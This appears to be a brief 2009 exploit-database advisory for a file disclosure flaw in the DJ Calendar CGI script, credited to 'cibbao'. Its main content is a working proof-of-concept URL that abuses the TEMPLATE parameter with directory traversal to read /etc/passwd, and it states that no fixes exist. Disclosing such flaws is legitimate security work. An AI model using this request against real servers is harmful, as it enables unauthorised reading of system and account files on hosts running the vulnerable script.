DJ Calendar (DJcalendar.cgi TEMPLATE) File Disclosure Vuln

2009-07-14 17:01:11

Discovered by cibbao

PoC:

/cgi-bin/DJcalendar.cgi?TEMPLATE=/../../../../../../../etc/passwd

#

No fixes

In order to submit a new fix you need to be registered.